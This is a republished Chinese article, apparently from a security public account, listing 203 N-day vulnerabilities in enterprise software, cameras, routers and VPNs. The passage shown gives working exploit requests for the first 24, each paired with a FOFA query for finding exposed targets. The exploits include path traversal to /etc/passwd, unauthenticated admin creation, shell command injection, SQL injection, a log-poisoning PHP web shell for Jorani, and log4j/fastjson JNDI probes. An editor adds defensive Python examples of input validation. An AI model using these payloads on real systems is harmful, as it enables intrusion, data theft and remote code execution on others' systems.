Public internet vulnerability roundup, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is republished from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attack activity. This article is meant to help defenders; defensive teams can use its contents to run risk checks against their own assets.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly, in China and abroad, between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Security patches: every vulnerability listed here is already public. Contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long have been replaced with the word PAYLOAD. Search for the complete POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list" step. This article is the complete, current list; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).
01 Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT management platform arbitrary file read
21. 大华 ICC intelligent IoT management platform random remote code execution
22. 大华 ICC intelligent IoT management platform log4j remote code execution
23. 大华 ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 (QAX) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 in-vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02 POC list

1. StarRocks MPP database unauthenticated access

FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read

FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure

FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation

FOFA: title="EasyCVR"

Replace the password value with the MD5 of the password you want to set.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution

FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 (Sangfor) NGAF arbitrary file read

FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download

FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE

FOFA: icon_hash="-1344736688"

Log in to the admin panel with the default account admin, then send the following request. The stok value in the URL and the sysauth cookie both come from that login; the injected command sits in the wifiRebootrange field.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

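Entries 5 and 8 share one root cause: a form or query field (log=;whoami, wifiRebootrange=12:00; id;) is spliced into a shell command line, so a semicolon ends the intended command and starts the attacker's. The Python below is an example added by the editor, not code from either device or from the original article. It shows the vulnerable construction beside the hardened one (allowlist the field, then execute via an argv list with no shell). Because the page does not show the firmware command the handlers really run, echo is assumed as a stand-in; it merely reflects its argument, so the effect of each construction is visible without executing anything harmful.

```python
import re
import subprocess

# Stand-in for the firmware command the CGI handler really runs; the page
# does not show it, so `echo` (which reflects its argument) is assumed.
TOOL = "echo"

# Allowlists per form field. wifiRebootrange must be a wall-clock HH:MM;
# NUUO's log parameter is assumed to name a plain file (no path separators
# or shell metacharacters). Both rules are assumptions for this example.
FIELD_RULES = {
    "wifiRebootrange": re.compile(r"^(?:[01]\d|2[0-3]):[0-5]\d$"),
    "log": re.compile(r"^[A-Za-z0-9_.-]+$"),
}


def build_shell_command(value):
    """The vulnerable construction: user input spliced into a shell string.
    With value = "12:00; id;" a shell would run TOOL and then `id`.
    Returned as text rather than executed, so the damage is visible."""
    return f"{TOOL} {value}"


def validate_field(name, value):
    """Allowlist check: True only when the value matches the field's shape."""
    return bool(FIELD_RULES[name].match(value))


def run_argv(value):
    """Hardened execution: the value is a single argv element and no shell is
    involved, so ';' and friends are plain data. Returns what TOOL received."""
    result = subprocess.run([TOOL, value], capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


def schedule_reboot(start):
    """What a fixed handler does with wifiRebootrange: validate, then run via argv."""
    if not validate_field("wifiRebootrange", start):
        raise ValueError(f"rejected wifiRebootrange value: {start!r}")
    return run_argv(start)


if __name__ == "__main__":
    print(build_shell_command("12:00; id;"))  # "echo 12:00; id;" -> a shell would also run id
    print(run_argv("12:00; id;"))             # "12:00; id;" -> passed through as one argument
    print(schedule_reboot("12:00"))           # "12:00"
    try:
        schedule_reboot("12:00; id;")
    except ValueError as exc:
        print(exc)
```

The order matters: validation rejects anything that is not a time, and the argv form means that even a value that slipped past validation could not start a second command. Using shell=True with the validated string would still be the wrong fix, because the allowlist then becomes the only barrier.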
9. 稻壳CMS keyword unauthenticated SQL injection

FOFA: app="Doccms"

GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload

FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection

FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution

FOFA: title="Jorani"

Step 1: obtain the cookies.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the following requests:

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST a login attempt. The language parameter is pointed at ../../application/logs and the login field carries PHP code, so the code is written into the application's log file; the code executes whatever base64-encoded command arrives in the K1SYJPMHLU4Z header.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r;
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the target to run the id command. The log file name carries the date (here 2023-10-24, matching the Date header above), and the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command string "echo ---------;id 2>&1;echo ---------;".

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

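Entries 2 (Casdoor) and 12 (Jorani) both work because a user-supplied path fragment is joined onto a base directory and the ".." segments are allowed to walk out of it: /static/../../etc/passwd leaves the static root, and language=../../application/logs turns a language selector into a pointer at the log directory. The Python below is an example added by the editor, not code from Casdoor, Jorani or the original article. It shows the naive resolution beside a hardened one; the root directories and the language allowlist are assumed for illustration, and it is assumed (as the POC's traversal suggests) that the language value selects a subdirectory.

```python
import posixpath

STATIC_ROOT = "/srv/app/static"                   # assumed web root behind /static
LANGUAGE_ROOT = "/srv/app/application/language"   # assumed language directory
ALLOWED_LANGUAGES = {"en", "fr", "zh"}            # assumed allowlist


def resolve_unsafe(root, requested):
    """The pattern behind entries 2 and 12: join and normalize, never check.
    Each '..' walks one level up, so enough of them reach '/' and the
    request can name any file the process may read."""
    return posixpath.normpath(posixpath.join(root, requested))


def is_inside(root, path):
    """True when `path` is `root` itself or lies below it. The trailing slash
    matters: '/srv/app/static2/x' must not pass for root '/srv/app/static'."""
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def resolve_safe(root, requested):
    """Hardened resolution: reject NUL bytes and absolute paths, normalize the
    joined path, then require it to stay inside `root`. The request path must
    already be percent-decoded exactly once (the web server does that before
    the handler runs); decoding again here would reopen the %252e%252e hole.
    In a real handler, resolve symlinks (os.path.realpath) before this check."""
    if "\x00" in requested or requested.startswith("/"):
        raise ValueError(f"rejected path: {requested!r}")
    full = posixpath.normpath(posixpath.join(root, requested))
    if not is_inside(root, full):
        raise ValueError(f"path escapes {root}: {requested!r}")
    return full


def language_dir_safe(requested):
    """The selector names a directory, so an allowlist removes path handling
    entirely: '../../application/logs' is simply not a known language."""
    if requested not in ALLOWED_LANGUAGES:
        raise ValueError(f"unknown language: {requested!r}")
    return posixpath.join(LANGUAGE_ROOT, requested)


if __name__ == "__main__":
    traversal = "../../../../../../../../../../../etc/passwd"   # from entry 2
    print(resolve_unsafe(STATIC_ROOT, traversal))               # /etc/passwd
    for fn, arg in ((resolve_safe, traversal), (language_dir_safe, "../../application/logs")):
        try:
            print(fn(STATIC_ROOT, arg) if fn is resolve_safe else fn(arg))
        except ValueError as exc:
            print("blocked:", exc)
    print(resolve_safe(STATIC_ROOT, "css/../js/app.js"))        # stays inside, allowed
```

Note that resolve_safe still accepts "css/../js/app.js": the check is on where the path ends up, not on whether ".." appears, so legitimate relative references keep working while anything that leaves the root is refused.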
13. 红帆 iOffice ioFileDown arbitrary file read

FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure

FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure

CVE-2024-0490

FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection

FOFA: title="HFOffice"

The POC makes the database compute the MD5 of the string 1234 (HASHBYTES, i.e. SQL Server).

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection

FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure

FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection

FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT management platform arbitrary file read

FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT management platform random remote code execution

FOFA: icon_hash="-1935899595"

The body is the usual fastjson DNS probe: it is deliberately not well-formed JSON, but fastjson still instantiates the java.net.URL object, which resolves the host named in val. A hit on your DNS log (replace the dnslog host with your own) confirms the vulnerable parser.

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华 ICC intelligent IoT management platform log4j remote code execution

FOFA: icon_hash="-1935899595"

The ${jndi:...} string in loginName is logged through Log4j; a hit on the DNS log confirms the lookup fires (replace dnslog with your own domain).

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. 大华 ICC intelligent IoT management platform fastjson remote code execution

FOFA: icon_hash="-1935899595"

Same endpoint and payload shape as entry 21; replace DNSLOG with your own DNS log domain.

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload

FOFA: icon_hash="1085941792"

The fname field controls the destination path, which is how a .txt upload is written as a JSP under the web root.

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
